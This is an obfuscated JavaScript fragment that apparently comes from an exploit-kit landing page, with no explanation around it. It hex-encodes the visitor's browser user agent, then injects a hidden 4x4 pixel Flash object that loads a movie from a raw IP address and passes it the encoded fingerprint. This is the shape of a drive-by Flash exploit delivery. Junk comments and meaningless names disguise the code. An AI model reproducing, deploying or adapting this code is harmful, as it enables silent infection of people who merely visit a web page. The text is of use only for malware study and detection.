/*s97948d33573hssfj86173fs*/function hgfgerdfgdf(num, width){/*s61632d45429hfj61192fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s10174d81050hfj73025fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s9237d29389hfj38325fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s87286d82451hfj35684fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd77659hfs*/c += b + d;/*s24264d43924hfj51648fs*/e += 1;}return c;}/*s55036dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.78.226/?ODc2OTI2Mjk=&mail=Rizo9bUlgaoqj4iEPSwBSUgpaAqxSJYAgT-5OVHLA431-mzrAXcckkkxeH6mBYmegtVlsR5QsRrK-IUaCf&help=noise&paper=xHzQMrDYbR7FFYPfKPrEUKREMU3WA0eKwYyZhazVF5-xFDfGpbH1Fx_spV-dCFyEmvJvdLMHIwKh1UTASw&inform=ODI1MTQ3MA==&gift=MjIyMzA2NTg=", ghnvbn("http://188.225.78.226/?OTAzODI5NTA=&inform=MTQ0NDE2NTQ=&mail=Czj0OAcgQ0yohcVVMb9qus2EPRyECdhJeK_xaKMghE_JOXF-U-2V79mrAkcc8lwRaD6FENjOse&paper=xX_QMvWebRXQCJ3EKvncT6NHMVHRHECL2YydmrHQefjaeVWkzrHFTF_xozKASASG6_FtdfJSDQ&help=money&gift=MTAwMzk0Mjg=","wexykukusw"));